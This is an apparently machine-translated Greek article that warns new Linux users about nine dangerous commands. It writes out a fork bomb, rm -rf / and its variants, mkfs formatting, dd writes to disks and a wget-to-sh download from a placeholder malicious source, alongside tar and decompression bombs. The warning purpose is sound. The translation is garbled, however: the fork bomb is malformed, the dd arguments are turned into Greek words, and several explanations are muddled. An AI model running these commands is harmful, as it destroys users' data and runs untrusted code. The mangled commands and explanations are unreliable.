9 εντολές και κώδικες Linux για να είστε προσεκτικοί
Οι εντολές του κελύφους / τερματικού Linux είναι πολύ ισχυρές και απλά μια απλή εντολή θα μπορούσε να οδηγήσει σε μία διαγραφή ενός φακέλου, αρχείων ή ριζικού φακέλου κ.λπ..
Σε ορισμένες περιπτώσεις, το Linux δεν θα σας ζητήσει ακόμη την επιβεβαίωση, αλλά θα εκτελέσει αμέσως την εντολή σας προκαλώντας χάνουν πολύτιμα δεδομένα και πληροφορίες αποθηκεύονται σε αυτά τα αρχεία και τους φακέλους.
Είναι κοινό για τους χρήστες να δημοσιεύουν περιεχόμενο στο διαδίκτυο συστήνοντας νέους χρήστες του Linux να εκτελέσουν αυτές τις εντολές. Αυτό μπορεί να φαίνεται σαν ένα αστείο για κάποιον που έχει δημοσιεύσει το περιεχόμενο, αλλά δεν είναι θέμα γέλιου για το άτομο στο άλλο άκρο.
Έχουμε συγκεντρώσει κάποιες εντολές Linux που είναι αρκετά επιβλαβείς για το σύστημά σας για να σας βοηθήσει να αποφύγετε. Λάβετε υπόψη ότι είναι πράγματι επικίνδυνες και μπορεί να τροποποιηθεί ακόμη και με διάφορους τρόπους για να παράγει νέες εντολές να προκαλέσει περισσότερες ζημιές.
Ένα σημαντικό πράγμα που πρέπει να σημειωθεί είναι αυτό κάποιες από αυτές τις εντολές είναι επικίνδυνες μόνο αν είναι προκαθορισμένες με το sudo στο Ubuntu. Ενώ σε άλλες διανομές του Linux, οι περισσότερες από αυτές τις εντολές θα είναι επικίνδυνες για την εκτέλεση ως root.
Ρίξτε μια ματιά στο 9 εντολές και κωδικούς θα πρέπει να αποφύγετε την εκτέλεση.
1. Εντολή βόμβας πτώσης Linux
: () : |: &:
γνωστός και ως Βόμβα Πιρούνι είναι μια επίθεση άρνησης υπηρεσίας κατά ενός συστήματος Linux. : () : |: &:
είναι μια λειτουργία bash. Μόλις εκτελεστεί, επαναλαμβάνεται πολλές φορές μέχρι να παγώσει το σύστημα.
Μπορείτε να το ξεφορτωθείτε μόνο αφού επανεκκινήσετε το σύστημά σας. Επομένως, να είστε προσεκτικοί κατά την εκτέλεση αυτής της εντολής στο κέλυφος του Linux.
2. Φάκελος mv / εντολή / dev / null
φάκελο mv / dev / null
είναι μια άλλη επικίνδυνη εντολή. Dev / null
ή μηδενική συσκευή
είναι ένα αρχείο συσκευής που απορρίπτει όλα τα δεδομένα γραμμένα σε αυτό, αλλά αναφέρει ότι η λειτουργία γραφής εκτελείται με επιτυχία. Είναι επίσης γνωστό ως λίγο bucked ή μαύρη τρύπα.
3. rm -rf εντολή
rm -rf
εντολή είναι ένας γρήγορος τρόπος να διαγράψτε έναν φάκελο και το περιεχόμενό του στο λειτουργικό σύστημα Linux. Αν δεν ξέρετε πώς να το χρησιμοποιήσετε σωστά τότε μπορεί να γίνει πολύ επικίνδυνο για το σύστημα. Οι πιο συνηθισμένοι συνδυασμοί και επιλογές που χρησιμοποιούνται με την εντολή rm-rf παρατίθενται παρακάτω:
rm
εντολή χρησιμοποιείται για τη διαγραφή των αρχείων στο σύστημα Linux.rm -f
εντολή καταργεί τα αρχεία μόνο για ανάγνωση στο φάκελο χωρίς προτροπή.rm-r
εντολή διαγράφει αναδρομικά το περιεχόμενο ενός φακέλου.rm -d
η εντολή χρησιμοποιείται για την κατάργηση ενός κεντρικού καταλόγου, αλλά θα αρνηθεί να καταργήσει τον κατάλογο αν δεν είναι άδεια.rm -rf /
η εντολή χρησιμοποιείται για εξαναγκασμένη διαγραφή (διαγράφει, ακόμη και αν προστατεύεται με εγγραφή) από όλο το περιεχόμενο του ριζικού καταλόγου και των δευτερευόντων φακέλων.rm -rf *
η εντολή χρησιμοποιείται για την εξαναγκασμένη διαγραφή όλου του περιεχομένου στον τρέχοντα κατάλογο (κατάλογος στον οποίο εργάζεστε επί του παρόντος) και στους υποφακέλους.rm -rf.
Η εντολή αυτή χρησιμοποιείται για την εξαναγκασμένη διαγραφή ολόκληρου του περιεχομένου του τρέχοντος φακέλου και των δευτερευόντων φακέλων. οrm-r. [^.] *
εντολή μπορεί επίσης να χρησιμοποιηθεί.rm -i
η εντολή χρησιμοποιείται για την αφαίρεση αρχείων και φακέλων, αλλά θα εμφανιστεί μια ερώτηση πριν από την κατάργηση.
4. εντολή mkfs
mkfs
μπορεί να είναι μια επικίνδυνη εντολή για το σύστημα που βασίζεται στο Linux αν δεν γνωρίζετε τον σκοπό του. Οτιδήποτε γράφεται μετά τα mkfs θα μορφοποιηθεί και θα αντικατασταθεί από ένα κενό σύστημα αρχείων Linux.
Όλες οι εντολές που αναφέρονται παρακάτω διαμορφώνουν το σκληρό δίσκο και απαιτούν δικαιώματα διαχειριστή:
mkfs
mkfs.ext3
mkfs.bfs
mkfs.ext2
mkfs.minix
mkfs.msdos
mkfs.reiserfs
mkfs.vfat
Η εντολή mkfs.cramfs
θα κάνει το ίδιο πράγμα με τα παραπάνω, αλλά δεν απαιτεί δικαιώματα διαχειριστή για εκτέλεση.
5. Βόμβα πίσσας
ο πίσσα
Η εντολή αυτή χρησιμοποιείται για το συνδυασμό πολλών αρχείων σε ένα μόνο αρχείο (αρχειοθετημένο αρχείο) στο .πίσσα μορφή. Μια βόμβα αρχείου ταινιών (Tar) μπορεί να δημιουργηθεί με αυτήν την εντολή.
είναι ένα αρχείο αρχειοθέτησης που εκρήγνυται σε χιλιάδες ή εκατομμύρια αρχεία με ονόματα παρόμοια με τα υπάρχοντα αρχεία στον τρέχοντα κατάλογο και όχι σε έναν νέο κατάλογο όταν είναι αδαής.
Μπορείτε να αποφύγετε να πέσετε θύμα μίας βόμβας με πίσσα δημιουργώντας τακτικά ένα νέο προστατευτικό κατάλογο κάθε φορά που λαμβάνετε ένα αρχείο tar και στη συνέχεια να μετακινήσετε το ληφθέν αρχείο tar σε αυτόν τον κατάλογο πριν από την αδράνεια.
Εάν το αρχείο tar είναι πράγματι μια πίσσα πίσσα τότε μπορείτε απλά να αφαιρέσετε το νεοδημιουργημένο κατάλογο για να απαλλαγούμε από αυτό. Ένας άλλος τρόπος για να αποφευχθεί η έκρηξη μιας βόμβας πίσσας είναι μέσω ο -t
επιλογή για την εμφάνιση ολόκληρου του περιεχομένου ενός αρχείου tar για να σας δώσουμε μια ιδέα για τον τύπο περιεχομένου που περιέχεται στο αρχείο tar.
6. εντολή dd
ο dd
εντολή χρησιμοποιείται για να αντιγραφή & μετατροπή διαμερισμάτων σκληρού δίσκου. Ωστόσο, μπορεί να αποδειχθεί επιβλαβές εάν καθορίσετε λάθος προορισμό.
Η εντολή μπορεί να είναι οποιαδήποτε από αυτές:
dd αν = / dev / hda της = / dev / hdb
dd εάν = / dev / hda της = / dev / sdb
dd if = κάτι από = / dev / hda
dd if = κάτι από = / dev / sda
Η ακόλουθη εντολή θα μηδενίζει ολόκληρο τον πρωτεύοντα σκληρό δίσκο: dd εάν = / dev / μηδέν = / dev / είχε
7. Κωδικός Script Shell
Κάποιος μπορεί να σας θυμάσει δίνοντάς σας τη σύνδεση σε ένα σενάριο κελύφους και σας προσυπογράφει να το κατεβάσετε και να το εκτελέσετε. Το σενάριο μπορεί να περιέχει κάποιο κακόβουλο ή επικίνδυνο κώδικα μέσα. ο μορφή εντολής μπορεί να μοιάζει με αυτό: wget http: // some_malicious_source -O- | SH
. ο wget
θα κατεβάσει το σενάριο ενώ το sh κατεβάζει την εκτέλεση δέσμης ενεργειών.
8. Κακόβουλος πηγαίος κώδικας
Κάποιος σας δίνει τον πηγαίο κώδικα και σας ζητά να τον συντάξετε. Ο κώδικας μπορεί να φαίνεται να είναι ένας κανονικός κώδικας, αλλά στην πραγματικότητα κάποιος κακόβουλος κώδικας είναι συγκαλυμμένος στον μεγάλο πηγαίο κώδικα και μπορεί να προκαλέσει βλάβη στο σύστημά σας. Για να αποφευχθεί η θυματοποίηση από αυτό το είδος επίθεσης, Αποδέχεστε και καταρτίζετε τον πηγαίο κώδικα μόνο από αξιόπιστες πηγές.
9. Βόμβα αποσυμπίεσης
Έχετε λάβει ένα συμπιεσμένο αρχείο και σας ζητείται να εξαγάγετε αυτό το αρχείο που φαίνεται να είναι πολύ μικρό σε μέγεθος, αλλά μπορεί να είναι μερικά KB. στην πραγματικότητα, αυτό το συμπιεσμένο αρχείο μικρού μεγέθους περιέχει πολύ συμπιεσμένα δεδομένα.
Μόλις αποσυμπιεστεί το αρχείο, εξάγονται εκατοντάδες GB δεδομένων μπορεί να γεμίσει το σκληρό σας δίσκο για να μειώσετε την απόδοση του συστήματός σας. Για να αποφύγετε αυτή την κατάσταση, θυμηθείτε πάντα να αποδεχτείτε δεδομένα από αξιόπιστες πηγές.